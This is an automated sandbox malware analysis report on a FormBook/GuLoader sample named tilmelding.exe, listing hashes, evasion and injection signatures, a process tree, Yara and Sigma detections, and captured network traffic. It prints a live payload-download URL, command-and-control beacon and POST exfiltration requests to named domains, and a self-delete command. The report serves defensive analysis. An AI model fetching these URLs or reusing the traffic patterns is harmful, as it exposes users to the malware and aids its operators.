Analysis Report tilmelding.bin

Overview

General Information

Sample Name: tilmelding.bin (renamed file extension from bin to exe)
MD5: 8d41f4a492017be7c529a1630e3906f8
SHA1: bcb6a48903d6f8eafe41c4ed68d2986201c96d44
SHA256: 27b805e1ceddb91ebec39349aa21ea5619c84e4c6ef3eb439b8156d66813e13e

Most interesting Screenshot:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect virtual machines
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Deletes itself after installation
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • tilmelding.exe (PID: 2184 cmdline: 'C:\Users\user\Desktop\tilmelding.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
    • tilmelding.exe (PID: 2144 cmdline: 'C:\Users\user\Desktop\tilmelding.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
      • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • wininit.exe (PID: 764 cmdline: C:\Windows\System32\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
          • cmd.exe (PID: 2272 cmdline: /c del 'C:\Users\user\Desktop\tilmelding.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • firefox.exe (PID: 2468 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
        • gdiddfh.exe (PID: 2456 cmdline: C:\Program Files\A_hh\gdiddfh.exe MD5: 8D41F4A492017BE7C529A1630E3906F8)
          • gdiddfh.exe (PID: 2428 cmdline: C:\Program Files\A_hh\gdiddfh.exe MD5: 8D41F4A492017BE7C529A1630E3906F8)
        • gdiddfh.exe (PID: 2464 cmdline: 'C:\Program Files\A_hh\gdiddfh.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
          • gdiddfh.exe (PID: 2472 cmdline: 'C:\Program Files\A_hh\gdiddfh.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
        • cmd.exe (PID: 2628 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
        • svchost.exe (PID: 2604 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: File Created with System Process Name
Source: File created | Author: Sander Wiebing | Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\A_hh
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1216, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2604
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\wininit.exe, CommandLine: C:\Windows\System32\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wininit.exe, NewProcessName: C:\Windows\System32\wininit.exe, OriginalFileName: C:\Windows\System32\wininit.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1216, ProcessCommandLine: C:\Windows\System32\wininit.exe, ProcessId: 764

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: tilmelding.exe | Avira: detected
Antivirus detection for URL or domain
Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin~J9t | Avira URL Cloud: Label: phishing
Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin | Avira URL Cloud: Label: phishing
Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binSJ9Y | Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Program Files\A_hh\gdiddfh.exe | Avira: detection malicious, Label: HEUR/AGEN.1046816
Multi AV Scanner detection for domain / URL
Source: ukaimc.webredirect.org | Virustotal: Detection: 7%
Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin | Virustotal: Detection: 13%
Multi AV Scanner detection for dropped file
Source: C:\Program Files\A_hh\gdiddfh.exe | Virustotal: Detection: 26%
Source: C:\Program Files\A_hh\gdiddfh.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\A_hh\gdiddfh.exe | Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\A_hh\gdiddfh.exe | ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: tilmelding.exe | Virustotal: Detection: 26%
Source: tilmelding.exe | ReversingLabs: Detection: 63%
Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1539233364.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1539422251.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1390601976.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2702578042.03C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1523518068.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.970738080.006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2696183744.001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2695859455.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1523696414.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2696313938.00200000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Program Files\A_hh\gdiddfh.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: tilmelding.exe | Joe Sandbox ML: detected

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\tilmelding.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 1_2_1EAB1E4C
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop esi | 7_2_000FA040
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000F136A
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000F1370
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000F94E0
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000FADA5
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000FA630
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop ebx | 7_2_000EA6B0
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000FA7E9
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then pop edi | 7_2_000FA7E7
Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 4x nop then jmp 1EBC7098h | 10_2_1EBC7072
Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 4x nop then jmp 1EC4B9BEh | 10_2_1EBB45E6

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.faketaxiholland.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.pensah.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.easyamazonmail.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.draconiandiesel.info replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.midlandtxcandles.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.xn--24tw29b3pc.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.thecoffeecup.kiwi replaycode: Server failure (2)
Source: unknown | DNS traffic detected: query: www.campingcasa.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.villanuevacommunications.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.ggqrcm.online replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.maikanetaka.com replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /kkx/?3fF8Bb=64Wxmnii3CxZo/YKiPSrrakJx+HPrnC+CLK+DCPODnQVNwq5cbSMGcyAEB+S8UKNrGkEIw==&6ly=zBcTivvxRzCL HTTP/1.1 | Host: www.atechels.net | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kkx/?3fF8Bb=q34/tD3k/u0ytkg25vVqgsFDW38QMsYC4CmmiU0dT4dFpHI6Od9O4assWqG75Uh3xGYd1A==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1 | Host: www.therichnurse.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kkx/?3fF8Bb=an/3nFwlmuh8GBUGJOd9Y7dWGi7RXgMeqzUW/F2v8zHWXFzxfnYdysIE9cWJg/gbYSIETQ==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1 | Host: www.comoganhodinheiro.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kkx/?3fF8Bb=aeqXfN2ZigXkOYDZmATYag0CPCLp2roYAEKzfhOPm+Vqc/Rfg767hk4JLxOZzpDt5TsoOA==&6ly=zBcTivvxRzCL HTTP/1.1 | Host: www.yofdyk.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kkx/?3fF8Bb=HE7hqJBNBdh2+WJ10mmwHGZYBK3+xqVMGaOARpHbjj4G+yedevSk31LHSlD49+RkwpbDRg==&6ly=zBcTivvxRzCL HTTP/1.1 | Host: www.livetruntknutenblogg.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 205.178.189.131 205.178.189.131
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected: GET /uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ukaimc.webredirect.org | Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ukaimc.webredirect.org
Source: unknown | HTTP traffic detected: POST /kkx/ HTTP/1.1 | Host: www.therichnurse.com | Connection: close | Content-Length: 163360 | Cache-Control: no-cache | Origin: http://www.therichnurse.com | User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.therichnurse.com/kkx/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 28 May 2020 05:58:50 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 327 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /kkx/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0N
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: wininit.exe, 00000004.00000002.2697877520.01DDF000.00000004.00000001.sdmp, firefox.exe, 00000007.00000002.1390761279.0091F000.00000004.00000001.sdmp | String found in binary or memory: http://power.networksolutions.com/index.html
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: tilmelding.exe, 00000001.00000002.969385138.00150000.00000040.00000001.sdmp, gdiddfh.exe, 0000000A.00000002.1523937546.00150000.00000040.00000001.sdmp, gdiddfh.exe, 0000000B.00000002.1539610673.00150000.00000040.00000001.sdmp | String found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin
Source: gdiddfh.exe, 0000000B.00000002.1539666819.00293000.00000004.00000020.sdmp | String found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binSJ9Y
Source: gdiddfh.exe, 0000000B.00000002.1539666819.00293000.00000004.00000020.sdmp | String found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin~J9t
Source: explorer.exe, 00000003.00000000.943386693.03A10000.00000008.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000003.00000002.2698822615.01ED0000.00000008.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.atechels.net
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.atechels.net/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.atechels.net/kkx/www.midlandtxcandles.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.atechels.netReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.campingcasa.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.campingcasa.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.campingcasa.com/kkx/www.ggqrcm.online
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.campingcasa.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.comoganhodinheiro.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.comoganhodinheiro.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.comoganhodinheiro.com/kkx/www.yofdyk.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.comoganhodinheiro.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.draconiandiesel.info
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.draconiandiesel.info/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.draconiandiesel.info/kkx/www.campingcasa.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.draconiandiesel.infoReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.easyamazonmail.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.easyamazonmail.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.easyamazonmail.com/kkx/www.atechels.net
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.easyamazonmail.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.faketaxiholland.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.faketaxiholland.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.faketaxiholland.com/kkx/www.draconiandiesel.info
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.faketaxiholland.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.ggqrcm.online
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.ggqrcm.online/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.ggqrcm.online/kkx/www.maikanetaka.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.ggqrcm.onlineReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp, wininit.exe, 00000004.00000002.2697777774.01AE9000.00000004.00000001.sdmp | String found in binary or memory: http://www.livetruntknutenblogg.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp, wininit.exe, 00000004.00000002.2697777774.01AE9000.00000004.00000001.sdmp | String found in binary or memory: http://www.livetruntknutenblogg.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.livetruntknutenblogg.com/kkx/www.thecoffeecup.kiwi
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.livetruntknutenblogg.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.maikanetaka.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.maikanetaka.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.maikanetaka.com/kkx/www.comoganhodinheiro.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.maikanetaka.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.midlandtxcandles.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.midlandtxcandles.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.midlandtxcandles.com/kkx/www.therichnurse.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.midlandtxcandles.comReferer:
Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.pensah.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.pensah.com/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.pensah.com/kkx/www.easyamazonmail.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.pensah.comReferer:
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.thecoffeecup.kiwi
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.thecoffeecup.kiwi/kkx/
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.thecoffeecup.kiwi/kkx/www.xn--24tw29b3pc.com
Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp | String found in binary or memory: http://www.thecoffeecup.kiwiReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com/kkx/www.faketaxiholland.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com/kkx/www.pensah.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com/kkx/www.livetruntknutenblogg.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.comReferer:
      Source: wininit.exe, 00000004.00000003.1388975198.00650000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: wininit.exe, 00000004.00000002.2697877520.01DDF000.00000004.00000001.sdmpString found in binary or memory: https://www.comoganhodinheiro.com/kkx/?3fF8Bb=an/3nFwlmuh8GBUGJOd9Y7dWGi7RXgMeqzUW/F2v8zHWXFzxfnYdys
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

      E-Banking Fraud:

      Yara detected FormBook

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\System32\wininit.exe; Dropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologri.ini
      Source: C:\Windows\System32\wininit.exe; Dropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologrv.ini
      Source: C:\Program Files\Mozilla Firefox\firefox.exe; Dropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologrf.ini
      Malicious sample detected (through community Yara rule)
      Potential malicious icon found
      Source: initial sample; Icon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4C8891_2_1EB4C889
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB749901_2_1EB74990
